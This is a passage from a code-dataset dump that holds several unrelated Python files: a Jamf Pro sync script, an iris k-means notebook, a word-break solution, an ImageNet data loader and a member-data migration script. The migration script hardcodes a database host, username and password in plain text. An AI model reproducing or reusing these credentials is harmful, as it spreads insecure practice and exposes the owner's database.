write_jenkins_file():\n \"\"\"Write CHANGED_EXT_ATTRS and CHANGED_SCRIPTS to Jenkins file.\n\n $eas will contain the changed extension attributes, and $scripts will\n contain the changed scripts\n\n If there are no changes, the variable will be set to \"None\"\n\n Args:\n None\n\n Returns:\n None\n\n \"\"\"\n ea_contents = [\"eas=None\"]\n sc_contents = [\"scripts=None\"]\n if CHANGED_EXT_ATTRS:\n ea_contents = jenkins_format(\"eas\", CHANGED_EXT_ATTRS)\n ea_contents[-1] = ea_contents[-1].rstrip(\"\\\\\")\n if CHANGED_SCRIPTS:\n sc_contents = jenkins_format(\"scripts\", CHANGED_SCRIPTS)\n with open(\"jenkins.properties\", \"w\") as f:\n f.write(\"\\n\".join(ea_contents + sc_contents))\n\n\nasync def find_subdirs(_path):\n \"\"\"Globs a folder for subfolders.\n\n Args:\n _path (pathlib.Path): Folder to glob.\n\n Returns:\n list: Contains ``pathlib.Path`` objects for every folder.\n\n \"\"\"\n return [f for f in FILE_PATH.joinpath(_path).glob(\"*\") if f.is_dir()]\n\n\ndef get_args():\n \"\"\"Parse command line arguments.\n\n Reads command line arguments and returns their values. If required\n arguments are missing, the script does not continue executing. Also\n provides usage information.\n\n Args:\n None\n\n Returns:\n argparse.Namespace: Object containing all of the command line arguments\n or their defaults as attributes.\n\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Sync repo with JamfPro\")\n parser.add_argument(\n \"--url\", required=True, help=(\n \"URL for the target JSS instance (i.e. \"\n \"'https://mycompany.jamfcloud.com') (Required)\"))\n parser.add_argument(\n \"--username\", required=True, help=(\n \"Username in JSS with API privileges. (Required)\"))\n parser.add_argument(\n \"--password\", help=(\n \"Password for the 'username' account. If not provided, you will \"\n \"be prompted.\"))\n parser.add_argument(\n \"--limit\", type=int, default=25, help=(\n \"Limit of the total number of connections to make to the JSS.\"))\n parser.add_argument(\n \"--timeout\", type=int, default=60, help=(\n \"Number of seconds before a timeout is called and the request is \"\n \"attempted again.\"))\n parser.add_argument(\n \"--retries\", type=int, default=3, help=(\n \"Number of times to retry a request after a timeout occurs.\"))\n parser.add_argument(\n \"--verbose\", action=\"store_true\", help=(\n \"Greatly increase the output of the logging.\"))\n parser.add_argument(\n \"--do_not_verify_ssl\", action=\"store_false\", help=(\n \"Do not verify the SSL Certificate of the target JSS.\"))\n parser.add_argument(\n \"--update_all\", action=\"store_true\", help=(\n \"Update all objects even if they are unchanged.\"))\n parser.add_argument(\n \"--jenkins\", action=\"store_true\", help=(\n \"Write a Jenkins file: jenkins.properties with updated scripts \"\n \"and eas, and compare the '$GIT_PREVIOUS_COMMIT' environment \"\n \"variable with '$GIT_COMMIT'\"))\n return parser.parse_args()\n\n\nasync def main():\n \"\"\"Main Program: Called with script is executed with ``python sync.py``\n\n This is where all of the ``JamfObject``s are defined. The\n ``aiohttp.ClientSession`` and ``asyncio.BoundedSemaphore`` are setup, the\n object information is gathered, and uploaded if necessary.\n\n Args:\n None\n\n Returns:\n int: Returns a 1 on error and a 0 when successful to be passed to\n ``sys.exit`` so that failed jobs are caught when executing in a\n CI/CD environment.\n\n \"\"\"\n # pylint: disable=global-statement\n global CATEGORIES\n # Create the base objects for each type of upload.\n # Future: Make JamfObject a Factory to automate this.\n extension_attributes = sorted([\n ExtensionAttribute(ea.name)\n for ea in await find_subdirs(\"extension_attributes\")\n if ea.name in CHANGED_EXT_ATTRS or ARGS.update_all],\n key=lambda ea: ea.folder)\n scripts = sorted([\n Script(sc.name)\n for sc in await find_subdirs(\"scripts\")\n if sc.name in CHANGED_SCRIPTS or ARGS.update_all],\n key=lambda sc: sc.folder)\n all_items = extension_attributes + scripts\n # Start processing objects.\n semaphore = asyncio.BoundedSemaphore(ARGS.limit)\n tcp_connector = aiohttp.TCPConnector(ssl=ARGS.do_not_verify_ssl)\n async with aiohttp.ClientSession(connector=tcp_connector) as session:\n CATEGORIES = await get_existing_categories(session, semaphore)\n # GET item information (XML,etc).\n await asyncio.gather(\n *[asyncio.ensure_future(t.get(session, semaphore))\n for t in all_items])\n LOG.debug(\"Information Collected. Beginning upload process.\")\n print(\"\\n\\n== Beginning Upload ==\\n\")\n # PUT updated information into the JPS. Returns a list of bools.\n put_success = await asyncio.gather(\n *[asyncio.ensure_future(t.put(session, semaphore))\n for t in all_items])\n # Since put_success is a list of bools with True for a successful PUT and\n # False if not, if not all of them are True, then at least one was False\n # ergo throw an error.\n if not all(put_success):\n LOG.error(\"There was a problem uploading one or more items. \"\n \"Please check the log output and act accordingly.\")\n return 1\n return 0\n\n\nif __name__ == \"__main__\":\n # Setup Globals\n asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())\n # Get command-line arguments\n ARGS = get_args()\n JPS_URL = ARGS.url\n TIME_OUT = ARGS.timeout\n RE_TRIES = ARGS.retries\n LOG.info(\"JPS Instance: %s\", JPS_URL)\n # Future, incorporate this into the async part of the script.\n CHANGED_EXT_ATTRS, CHANGED_SCRIPTS = check_for_changes()\n if not CHANGED_EXT_ATTRS and not CHANGED_SCRIPTS and not ARGS.update_all:\n LOG.info(\"No Changes to transfer to JPS.\")\n sys.exit(0)\n LOG.info(\"Changed Extension Attributes: %s\", CHANGED_EXT_ATTRS)\n LOG.info(\"Changed Scripts: %s\", CHANGED_SCRIPTS)\n if ARGS.jenkins:\n write_jenkins_file()\n # Ask for password if not supplied via command line args\n if not ARGS.password:\n ARGS.password = getpass.getpass()\n S_AUTH = aiohttp.BasicAuth(ARGS.username, ARGS.password)\n loop = asyncio.get_event_loop()\n if ARGS.verbose:\n LOG.setLevel(logging.DEBUG)\n loop.set_debug(True)\n loop.slow_callback_duration = 0.001\n warnings.simplefilter(\"always\", ResourceWarning)\n sys.exit(loop.run_until_complete(main()))\n","sub_path":"sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":32764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"71156451","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\n#import the following libraries.\nfrom sklearn import datasets\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.cluster import KMeans\n\n\n# In[3]:\n\n\n#Load the data.\niris = datasets.load_iris()\n\n\n# In[4]:\n\n\n#Define the target (Y as target) and predictors (X as sepal length and sepal width).\nX = iris.data[:, :2]\ny = iris.target\n\n\n# In[5]:\n\n\nX\n\n\n# In[7]:\n\n\ny\n\n\n# In[8]:\n\n\n#visualize data through a scatter plot.\nplt.scatter(X[:,0], X[:,1], c=y, cmap='gist_rainbow')\nplt.xlabel('Spea1 Length', fontsize=18)\nplt.ylabel('Sepal Width', fontsize=18)\n\n\n# In[9]:\n\n\n# create k means cluster and fit the model. Consider three clusters and a random state of 21.\nkm = KMeans(n_clusters = 3, n_jobs = 4, random_state=21)\nkm.fit(X)\n\n\n# In[ ]:\n\n\n\n\n\n# In[10]:\n\n\nkm\n\n\n# In[11]:\n\n\n# display the three center points of the three clusters.\ncenters = km.cluster_centers_\nprint(centers)\n\n\n# In[19]:\n\n\n#Plot the original clusters \nfigure, axes = plt.subplots(1, 2, figsize=(16,8))\naxes[0].scatter(X[:, 0], X[:, 1], c=y, cmap='gist_rainbow',\nedgecolor='k', s=150)\n#Plot the identified clusters \nnew_labels = km.labels_\naxes[1].scatter(X[:, 0], X[:, 1], c=new_labels, cmap='jet',\nedgecolor='k', s=150)\n# give the title for the graph\naxes[0].set_title('Actual', fontsize=18)\naxes[1].set_title('Predicted', fontsize=18)\n# give the X,Y axis label to the graph\naxes[0].set_xlabel('Sepal length', fontsize=18)\naxes[0].set_ylabel('Sepal width', fontsize=18)\naxes[1].set_xlabel('Sepal length', fontsize=18)\naxes[1].set_ylabel('Sepal width', fontsize=18)\n\n\n# In[15]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"cluster/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"572426062","text":"class Solution(object):\n \"\"\"\n Given a string s and a dictionary of words dict, determine if s can be segmented into a space-separated sequence of one or more dictionary words.\n\n For example, given\n s = \"leetcode\",\n dict = [\"leet\", \"code\"].\n\n Return true because \"leetcode\" can be segmented as \"leet code\".\n \"\"\"\n def wordBreak(self, s, wordDict):\n \"\"\"\n :type s: str\n :type wordDict: Set[str]\n :rtype: bool\n \"\"\"\n for e in wordDict:\n if s.startswith(e):\n if len(e) == len(s):\n return True\n else:\n if self.wordBreak(s[len(e):], wordDict):\n return True\n return False\n\nif __name__ == \"__main__\":\n a = Solution()\n print(a.wordBreak(\"leetcode\", [\"leet\", \"code\"]))\n print(a.wordBreak(\"leetcode\", [\"lee\", \"code\"]))\n","sub_path":"leet/139.WordBreak.py","file_name":"139.WordBreak.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"283096114","text":"\"\"\"CIFAR-10 data set.\n\nSee http://www.cs.toronto.edu/~kriz/cifar.html.\n\"\"\"\nimport os\nimport tensorflow as tf\nfrom template import BaseDataSampler\nimport sys\nimport multiprocessing\n\nHEIGHT = 224\nWIDTH = 224\nDEPTH = 3\ndatashape = [HEIGHT,WIDTH,DEPTH]\nnumexamples = 1281167\nsplit = 0.999\nDEFAULT_IMAGE_SIZE = 224\nNUM_CHANNELS = 3\nNUM_CLASSES = 1001\n\n\n\nimport data.imagenet.imagenet_preprocessing\n\n\nclass ImagenetDataset(object):\n \"\"\"Cifar10 data set.\n\n Described by http://www.cs.toronto.edu/~kriz/cifar.html.\n \"\"\"\n\n def __init__(self, data_dir, subset='train', use_distortion=True):\n self.data_dir = os.path.join(data_dir,\"imagenet\")\n self.subset = subset\n self.use_distortion = use_distortion\n\n def get_filenames(self):\n \"\"\"Returns a python list of all (sharded) data subset files.\n\n Returns:\n python list of all (sharded) data set files.\n Raises:\n ValueError: if there are not data_files matching the subset.\n \"\"\"\n tf_record_pattern = os.path.join(self.data_dir, '%s-*' % self.subset)\n data_files = tf.gfile.Glob(tf_record_pattern)\n if not data_files:\n print('No files found for dataset %s/%s at %s' % (self.name,\n self.subset,\n self.data_dir))\n\n self.download_message()\n sys.exit(-1)\n return data_files\n\n # def get_filenames(self):\n # if self.subset == 'train':\n # return [os.path.join(self.data_dir, 'train.tfrecords'), os.path.join(self.data_dir, 'validation.tfrecords')]\n # if self.subset in ['train', 'validation', 'eval']:\n # return [os.path.join(self.data_dir, self.subset + '.tfrecords')]\n # else:\n # raise ValueError('Invalid data subset \"%s\"' % self.subset)\n\n def parser(self, example_serialized, is_training):\n \"\"\"Parses a single tf.Example into image and label tensors.\"\"\"\n feature_map = {\n 'image/encoded': tf.FixedLenFeature([], dtype=tf.string,\n default_value=''),\n 'image/class/label': tf.FixedLenFeature([], dtype=tf.int64,\n default_value=-1),\n 'image/class/text': tf.FixedLenFeature([], dtype=tf.string,\n default_value=''),\n }\n sparse_float32 = tf.VarLenFeature(dtype=tf.float32)\n # Sparse features in Example proto.\n feature_map.update({k: sparse_float32 for k in ['image/object/bbox/xmin',\n 'image/object/bbox/ymin',\n 'image/object/bbox/xmax',\n 'image/object/bbox/ymax']})\n\n features = tf.parse_single_example(example_serialized, feature_map)\n label = tf.cast(features['image/class/label'], dtype=tf.int32)\n\n xmin = tf.expand_dims(features['image/object/bbox/xmin'].values, 0)\n ymin = tf.expand_dims(features['image/object/bbox/ymin'].values, 0)\n xmax = tf.expand_dims(features['image/object/bbox/xmax'].values, 0)\n ymax = tf.expand_dims(features['image/object/bbox/ymax'].values, 0)\n\n # Note that we impose an ordering of (y, x) just to make life difficult.\n bbox = tf.concat([ymin, xmin, ymax, xmax], 0)\n\n # Force the variable number of bounding boxes into the shape\n # [1, num_boxes, coords].\n bbox = tf.expand_dims(bbox, 0)\n bbox = tf.transpose(bbox, [0, 2, 1])\n\n\n image_buffer = features[\"image/encoded\"]\n image = imagenet_preprocessing.preprocess_image(\n image_buffer=image_buffer,\n bbox=bbox,\n output_height=DEFAULT_IMAGE_SIZE,\n output_width=DEFAULT_IMAGE_SIZE,\n num_channels=NUM_CHANNELS,\n is_training=is_training)\n image = tf.cast(image, tf.float32)\n\n return image, label\n\n def make(self, is_training):\n \"\"\"Read the images and labels from 'filenames'.\"\"\"\n filenames = self.get_filenames()\n # Repeat infinitely.\n dataset = tf.data.TFRecordDataset(filenames) #.repeat()\n\n # Parse records.\n dataset = dataset.map(lambda val: self.parser(val,is_training=is_training), num_parallel_calls=multiprocessing.cpu_count())\n # dataset = dataset.map(self.parser)\n\n return dataset\n\n\nclass DataSampler(BaseDataSampler):\n\n def num_classes(self):\n \"\"\"Returns the number of classes in the data set.\"\"\"\n return 1001 # +1 for unused background class\n\n def __init__(self, data_dir):\n self.data_dir = data_dir\n\n # download and extract\n # filepath = os.path.join(self.data_dir, \"train.tfrecords\")\n if not tf.gfile.Exists(self.data_dir):\n tf.gfile.MakeDirs(self.data_dir)\n # if not tf.gfile.Exists(filepath):\n # print(\"No files found at \"+filepath)\n\n def num_examples_per_epoch(self,subset='train'):\n if subset == 'train':\n return int(numexamples*(split))\n elif subset == 'validation':\n return int(numexamples*(1-split))\n elif subset == 'test':\n return 50000\n else:\n raise ValueError('Invalid data subset \"%s\"' % subset)\n\n def training(self):\n if not hasattr(DataSampler,\"trainvaldata\"):\n DataSampler.trainvaldata = ImagenetDataset(self.data_dir, subset='train', use_distortion=False).make(is_training=True)\n splitsize_train = self.num_examples_per_epoch(\"train\")\n splitsize_test = self.num_examples_per_epoch(\"test\")\n splitsize_val = self.num_examples_per_epoch(\"validation\")\n print(\"Split ratio: \", splitsize_train,\" for Training, \", splitsize_val,\" for Validation,\", splitsize_test,\" for Testing.\")\n return DataSampler.trainvaldata.skip(splitsize_val)\n\n def validation(self):\n if not hasattr(DataSampler,\"trainvaldata\"):\n DataSampler.trainvaldata = ImagenetDataset(self.data_dir, subset='train', use_distortion=False).make(is_training=False)\n return DataSampler.trainvaldata.take(int(numexamples*(1-split)))\n\n def testing(self):\n return ImagenetDataset(self.data_dir, subset='validation', use_distortion=False).make(is_training=False)\n\n\n\n","sub_path":"data/imagenet/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"260367587","text":"'''Migrate old HQ data to the new schema\n\nThis script is kindof ugly as hell. Hopefully you'll never actually need to\nupdate it or use it ever again!\n'''\nfrom __future__ import print_function\n\nimport MySQLdb as mysqldb\nimport re\nimport sqlalchemy\nimport sys\nimport traceback\nimport yaml\nfrom collections import defaultdict\nfrom datetime import date, datetime\nfrom pprint import pprint, pformat\nfrom sqlalchemy import create_engine, MetaData\n\nclass MigrateException(Exception): pass\nclass AbortMember(Exception): pass\n\nCOUNTRY_MAP = {\n 'united states': 'US',\n 'afghanistan': 'AF',\n 'aland islands': 'AX',\n 'albania': 'AL',\n 'algeria': 'DZ',\n 'american samoa': 'AS',\n 'andorra': 'AD',\n 'angola': 'AO',\n 'anguilla': 'AI',\n 'antarctica': 'AQ',\n 'antigua and barbuda': 'AG',\n 'argentina': 'AR',\n 'armenia': 'AM',\n 'aruba': 'AW',\n 'australia': 'AU',\n 'austria': 'AT',\n 'azerbaijan': 'AZ',\n 'azores': 'AZX',\n 'bahamas': 'BS',\n 'bahrain': 'BH',\n 'bangladesh': 'BD',\n 'barbados': 'BB',\n 'belarus': 'BY',\n 'belgium': 'BE',\n 'belize': 'BZ',\n 'benin': 'BJ',\n 'bermuda': 'BM',\n 'bhutan': 'BT',\n 'bolivia': 'BO',\n 'bosnia and herzegovina': 'BA',\n 'botswana': 'BW',\n 'bouvet island': 'BV',\n 'brazil': 'BR',\n 'british indian ocean territory': 'IO',\n 'brunei darussalam': 'BN',\n 'bulgaria': 'BG',\n 'burkina faso': 'BF',\n 'burundi': 'BI',\n 'cambodia': 'KH',\n 'cameroon': 'CM',\n 'canada': 'CA',\n 'canary islands': 'CIX',\n 'cape verde': 'CV',\n 'cayman islands': 'KY',\n 'central african republic': 'CF',\n 'chad': 'TD',\n 'chile': 'CL',\n 'china': 'CN',\n 'christmas island': 'CX',\n 'cocos (keeling) islands': 'CC',\n 'colombia': 'CO',\n 'comoros': 'KM',\n 'congo': 'CG',\n 'congo, the democratic republic of the': 'CD',\n 'cook islands': 'CK',\n 'costa rica': 'CR',\n 'cote d\\'ivoire': 'CI',\n 'croatia': 'HR',\n 'cuba': 'CU',\n 'cyprus': 'CY',\n 'czech republic': 'CZ',\n 'denmark': 'DK',\n 'djibouti': 'DJ',\n 'dominica': 'DM',\n 'dominican republic': 'DO',\n 'ecuador': 'EC',\n 'egypt': 'EG',\n 'el salvador': 'SV',\n 'equatorial guinea': 'GQ',\n 'eritrea': 'ER',\n 'estonia': 'EE',\n 'ethiopia': 'ET',\n 'falkland islands (malvinas)': 'FK',\n 'faroe islands': 'FO',\n 'fiji': 'FJ',\n 'finland': 'FI',\n 'france': 'FR',\n 'french guiana': 'GF',\n 'french polynesia': 'PF',\n 'french southern territories': 'TF',\n 'gabon': 'GA',\n 'gambia': 'GM',\n 'georgia': 'GE',\n 'germany': 'DE',\n 'ghana': 'GH',\n 'gibraltar': 'GI',\n 'greece': 'GR',\n 'greenland': 'GL',\n 'grenada': 'GD',\n 'guadeloupe': 'GP',\n 'guam': 'GU',\n 'guatemala': 'GT',\n 'guernsey': 'GG',\n 'guinea': 'GN',\n 'guinea-bissau': 'GW',\n 'guyana': 'GY',\n 'haiti': 'HT',\n 'heard island and mcdonald islands': 'HM',\n 'holy see (vatican city state)': 'VA',\n 'honduras': 'HN',\n 'hong kong': 'HK',\n 'hungary': 'HU',\n 'iceland': 'IS',\n 'india': 'IN',\n 'indonesia': 'ID',\n 'iran, islamic republic of': 'IR',\n 'iraq': 'IQ',\n 'ireland': 'IE',\n 'isle of man': 'IM',\n 'israel': 'IL',\n 'italy': 'IT',\n 'jamaica': 'JM',\n 'japan': 'JP',\n 'jersey': 'JE',\n 'jordan': 'JO',\n 'kazakhstan': 'KZ',\n 'kenya': 'KE',\n 'kiribati': 'KI',\n 'korea, democratic people\\'s republic of': 'KP',\n 'korea, republic of': 'KR',\n 'kuwait': 'KW',\n 'kyrgyzstan': 'KG',\n 'lao people\\'s democratic republic': 'LA',\n 'latvia': 'LV',\n 'lebanon': 'LB',\n 'lesotho': 'LS',\n 'liberia': 'LR',\n 'libyan arab jamahiriya': 'LY',\n 'liechtenstein': 'LI',\n 'lithuania': 'LT',\n 'luxembourg': 'LU',\n 'macao': 'MO',\n 'macedonia, the former yugoslav republic of': 'MK',\n 'madagascar': 'MG',\n 'malawi': 'MW',\n 'malaysia': 'MY',\n 'maldives': 'MV',\n 'mali': 'ML',\n 'malta': 'MT',\n 'marshall islands': 'MH',\n 'martinique': 'MQ',\n 'mauritania': 'MR',\n 'mauritius': 'MU',\n 'mayotte': 'YT',\n 'mexico': 'MX',\n 'micronesia, federated states of': 'FM',\n 'moldova': 'MD',\n 'monaco': 'MC',\n 'mongolia': 'MN',\n 'montenegro': 'ME',\n 'montserrat': 'MS',\n 'morocco': 'MA',\n 'mozambique': 'MZ',\n 'myanmar': 'MM',\n 'namibia': 'NA',\n 'nauru': 'NR',\n 'nepal': 'NP',\n 'netherlands': 'NL',\n 'netherlands antilles': 'AN',\n 'new caledonia': 'NC',\n 'new zealand': 'NZ',\n 'nicaragua': 'NI',\n 'niger': 'NE',\n 'nigeria': 'NG',\n 'niue': 'NU',\n 'norfolk island': 'NF',\n 'northern ireland': 'NIX',\n 'northern mariana islands': 'MP',\n 'norway': 'NO',\n 'oman': 'OM',\n 'pakistan': 'PK',\n 'palau': 'PW',\n 'palestinian territory, occupied': 'PS',\n 'panama': 'PA',\n 'papua new guinea': 'PG',\n 'paraguay': 'PY',\n 'peru': 'PE',\n 'philippines': 'PH',\n 'pitcairn': 'PN',\n 'poland': 'PL',\n 'portugal': 'PT',\n 'puerto rico': 'PR',\n 'qatar': 'QA',\n 'reunion': 'RE',\n 'romania': 'RO',\n 'russian federation': 'RU',\n 'rwanda': 'RW',\n 'saint barthelemy': 'BL',\n 'saint helena': 'SH',\n 'saint kitts and nevis': 'KN',\n 'saint lucia': 'LC',\n 'saint martin': 'MF',\n 'saint pierre and miquelon': 'PM',\n 'saint vincent and the grenadines': 'VC',\n 'samoa': 'WS',\n 'san marino': 'SM',\n 'sao tome and principe': 'ST',\n 'saudi arabia': 'SA',\n 'scotland': 'SCX',\n 'senegal': 'SN',\n 'serbia': 'RS',\n 'seychelles': 'SC',\n 'sierra leone': 'SL',\n 'singapore': 'SG',\n 'slovakia': 'SK',\n 'slovenia': 'SI',\n 'solomon islands': 'SB',\n 'somalia': 'SO',\n 'south africa': 'ZA',\n 'south georgia and the south sandwich islands': 'GS',\n 'spain': 'ES',\n 'sri lanka': 'LK',\n 'sudan': 'SD',\n 'suriname': 'SR',\n 'svalbard and jan mayen': 'SJ',\n 'swaziland': 'SZ',\n 'sweden': 'SE',\n 'switzerland': 'CH',\n 'syrian arab republic': 'SY',\n 'taiwan': 'TW',\n 'tajikistan': 'TJ',\n 'tanzania, united republic of': 'TZ',\n 'thailand': 'TH',\n 'timor-leste': 'TL',\n 'togo': 'TG',\n 'tokelau': 'TK',\n 'tonga': 'TO',\n 'trinidad and tobago': 'TT',\n 'tunisia': 'TN',\n 'turkey': 'TR',\n 'turkmenistan': 'TM',\n 'turks and caicos islands': 'TC',\n 'tuvalu': 'TV',\n 'uganda': 'UG',\n 'ukraine': 'UA',\n 'united arab emirates': 'AE',\n 'united states minor outlying islands': 'UM',\n 'united kingdom': 'GB',\n 'uruguay': 'UY',\n 'uzbekistan': 'UZ',\n 'vanuatu': 'VU',\n 'venezuela': 'VE',\n 'viet nam': 'VN',\n 'virgin islands, british': 'VG',\n 'virgin islands, u.s.': 'VI',\n 'wales': 'WAX',\n 'wallis and futuna': 'WF',\n 'western sahara': 'EH',\n 'yemen': 'YE',\n 'zambia': 'ZM',\n 'zimbabwe': 'ZW',\n\n 'usa': 'US',\n 'russia': 'RU',\n 'england': 'GB',\n 'uk': 'GB',\n 'taiwan republic of china': 'TW',\n 'iran': 'IR',\n 'south korea': 'KR',\n 'cayman islands bwi': 'KY',\n 'tahiti french polynesia': 'PF',\n 'taiwan': 'TW',\n 'holland': 'NL',\n 'colombi': 'CO',\n 'korea south': 'KR',\n}\n\nDB = {\n 'host': 'db.aavso.org',\n 'user': 'aavso_web',\n 'passwd': 'vstar',\n 'db': 'oldhq'\n}\nDB_URI = 'mysql+mysqldb://aavso_web:vstar@db.aavso.org/oldhq?charset=utf8'\n\nclass MemberErrors(object):\n errors = {}\n\n def log(self, memberid, field, value, message='invalid value'):\n if not self.errors.get(memberid):\n self.errors[memberid] = []\n self.errors[memberid].append({\n \"field\": field, \n \"value\": value, \n \"message\": message\n })\n\n def __str__(self):\n return unicode(self).encode('utf8')\n\n def __unicode__(self):\n text = ''\n for id in sorted(self.errors.keys()):\n text += \"Member #\" + str(id) + \"\\n\"\n\n for error in self.errors[id]:\n text += u\" {field}: {value} -- {message}\\n\".format(**error)\n text += '\\n'\n\n return text\n\nmember_errors = MemberErrors()\n\ndef init():\n engine = create_engine(DB_URI)\n meta = MetaData(bind=engine)\n meta.reflect()\n return meta\n\ndef organizations(meta):\n engine = meta.bind\n org_t = meta.tables['organization']\n\n result = engine.execute(org_t.select())\n\n data = []\n for row in result:\n data.append({ \n 'model': 'hq.organization',\n 'pk': int(row.affiliation),\n 'fields': {\n 'name': row.orgname,\n 'abbreviation': row.abbreviation.strip().upper(),\n },\n })\n\n return data\n\ndef certifications(meta):\n engine = meta.bind\n cert_t = meta.tables['certifications']\n\n result = engine.execute(cert_t.select())\n\n data = []\n for row in result:\n data.append({\n 'model': 'hq.certification',\n 'pk': int(row[cert_t.c.id]),\n 'fields': {\n 'name': row[cert_t.c.name],\n },\n })\n\n return data\n\ndef obs_awards(meta):\n awards = [\n 'Visual',\n 'CCD',\n 'PEP',\n 'Photographic',\n 'Solar',\n 'SID',\n ]\n\n data = []\n for award,id in zip(awards, range(1, len(awards)+1)):\n data.append({\n 'model': 'hq.obsaward',\n 'pk': id, \n 'fields': {\n 'name': award,\n },\n })\n\n return data\n\ndef has_nonascii(text):\n for ch in text:\n if ord(ch) > 127:\n return True\n return False\n\ndef t(text):\n text = text or ''\n text = text.strip()\n return text\n\ndef titlize(text, id, field):\n text = t(text)\n \n if text.isupper() or text.islower() and len(text.strip('.')) > 1:\n member_errors.log(id, field, text, 'field has been title-cased')\n text = text.title()\n return text\n\nused_obscodes = []\ndef generate_member(row, payments):\n if payments:\n latest = max(payments, key=lambda x: int(x.Year[:4]))\n else:\n latest = defaultdict(lambda: None)\n member_errors.log(row.memberID, 'payments', '', \n 'member had no associated payments')\n\n id = int(row.memberID)\n\n member = {\n 'model': 'hq.member',\n 'pk': id,\n 'fields': {\n # obscode below\n 'title': titlize(row.title, id, 'title'),\n # given name below\n 'middle_name': titlize(row.middle_name, id, 'middle_name'),\n # family_name below\n 'name_suffix': titlize(row.name_suffix, id, 'name_suffix'),\n\n 'organization': titlize(row.name_ext, id, 'organization'),\n 'address1': titlize(row.address, id, 'address1'),\n 'address2': titlize(row.address_ext, id, 'address2'),\n 'city': titlize(row.city, id, 'city'),\n 'region': t(row.state),\n 'postal': t(row.zip),\n # country below\n 'phone1': t(row.phone1),\n 'phone2': t(row.phone2),\n 'email': t(row.email).lower(),\n 'email_optout': bool(row.email_optout),\n\n # special membership below\n 'created': row.Created or date(1900,1,1), # default value\n 'updated': row.Updated or date.today(),\n 'observer_added': row.date_observer_added or None,\n 'member_joined': row.date_joined or None,\n 'astronomer': bool(latest['Astronomer']),\n 'institution': bool(latest['Institution']),\n 'council': bool(latest['Council']),\n 'staff': False,\n 'address_invalid': bool(latest['Invalid_Address']),\n 'deceased': bool(latest['deceased']),\n 'solar_observer': bool(latest['solar_observer']),\n 'notes': t(row.note),\n 'observer_notes': t(row.obsnotes),\n\n 'profession': t(row.profession),\n 'affiliation_id': int(row.affiliation or 0),\n 'nickname': t(row.nickname),\n # birthdate below\n 'howheard': t(row.howheard),\n 'experience': t(row.experience),\n 'member_notes': t(row.member_notes),\n },\n }\n\n ### obscode ###\n if row.obscode:\n obscode = row.obscode.strip()\n if re.match(r'^[A-Z0-9]{1,6}$', obscode):\n if obscode in used_obscodes:\n member_errors.log(row.memberID, 'obscode', row.obscode,\n \"Duplicate obscode--omitting from this record\")\n else:\n used_obscodes.append(obscode)\n member['fields']['obscode'] = obscode\n else:\n member_errors.log(row.memberID, 'obscode', row.obscode)\n\n ### given_name ###\n first_name = t(row.first_name)\n if first_name:\n member['fields']['given_name'] = titlize(first_name, id, 'given_name')\n else:\n member['fields']['given_name'] = '.'\n member_errors.log(row.memberID, 'given_name', '', \n 'member has no first name to export -- set to default (.)')\n\n ### family_name ###\n last_name = t(row.last_name)\n if last_name:\n member['fields']['family_name'] = titlize(last_name, id, 'family_name')\n else:\n member_errors.log(row.memberID, 'last_name', '', \n 'ABORTED: member has no last name to export')\n raise AbortMember(\"No last name!\")\n\n ### country ###\n if row.country:\n code = COUNTRY_MAP.get(row.country.lower(), None)\n if code is None:\n member_errors.log(row.memberID, 'country', row.country, \n 'unknown country')\n else:\n member['fields']['country'] = code\n\n ### birthdate ###\n if row.birthdate:\n ambig_fmts = [\n '%m/%d/%Y',\n '%d/%m/%Y',\n\n '%m-%d-%Y',\n '%d-%m-%Y',\n\n '%m.%d.%Y',\n '%d.%m.%Y',\n ]\n fmts = [\n '%Y/%m/%d',\n '%Y-%m-%d',\n '%Y.%m.%d',\n\n '%B %d, %Y',\n '%b %d, %Y',\n '%B %d %Y',\n '%b %d %Y',\n '%d %B %Y',\n '%d %b %Y',\n ]\n\n bd = None\n text = row.birthdate.strip()\n\n # check against unambiguous formats\n for fmt in fmts:\n try:\n bd = datetime.strptime(text, fmt).date()\n break\n except ValueError:\n continue\n\n if bd:\n member['fields']['birthdate'] = bd\n else: # check against ambiguous formats\n for fmt in ambig_fmts:\n try:\n bd = datetime.strptime(text, fmt).date()\n break\n except ValueError:\n continue\n\n if bd:\n if bd.day <= 12 and bd.month <= 12:\n pass\n #member_errors.log(row.memberID, 'birthdate', \n # row.birthdate, \"birthdate is ambiguous\")\n else:\n member['fields']['birthdate'] = bd\n else: # didn't match any formats\n pass\n #member_errors.log(row.memberID, 'birthdate', row.birthdate,\n # \"couldn't parse birthdate\")\n\n ### special_membership ###\n if latest['membership_type'] == 'H':\n member['fields']['special_membership'] = 'honorary'\n if latest['membership_type'] == 'L':\n member['fields']['special_membership'] = 'lifetime'\n\n ### Check for non-ascii characters and log them ###\n for field in member['fields']:\n txt = member['fields'][field]\n if isinstance(txt, basestring) and has_nonascii(txt):\n member_errors.log(row.memberID, field, txt, \n 'Field contains non-ascii characters')\n\n return member\n\ndef generate_payments(member, payments, paid_2011):\n data = []\n ### payments ###\n for payment in payments:\n new_payment = {\n 'model': 'hq.payment',\n 'pk': None,\n 'fields': {\n 'member_id': member['pk'],\n 'amount': 0,\n },\n }\n\n if (payment.membership_type in ('N', 'H', 'L')):\n # not a payment if it's for non-member, honorary, lifetime\n continue\n\n ### type ###\n if payment.membership_type == 'R':\n typ = 'sponsored'\n elif payment.membership_type == 'M':\n typ = 'comp'\n elif payment.limited_income:\n if not payment.paid_membership:\n continue\n typ = 'junior'\n elif payment.membership_type == 'A':\n if not payment.paid_membership:\n continue\n typ = 'annual'\n elif payment.membership_type == 'S':\n if not payment.paid_membership:\n continue\n typ = 'sustaining'\n\n new_payment['fields']['type'] = typ\n\n ### 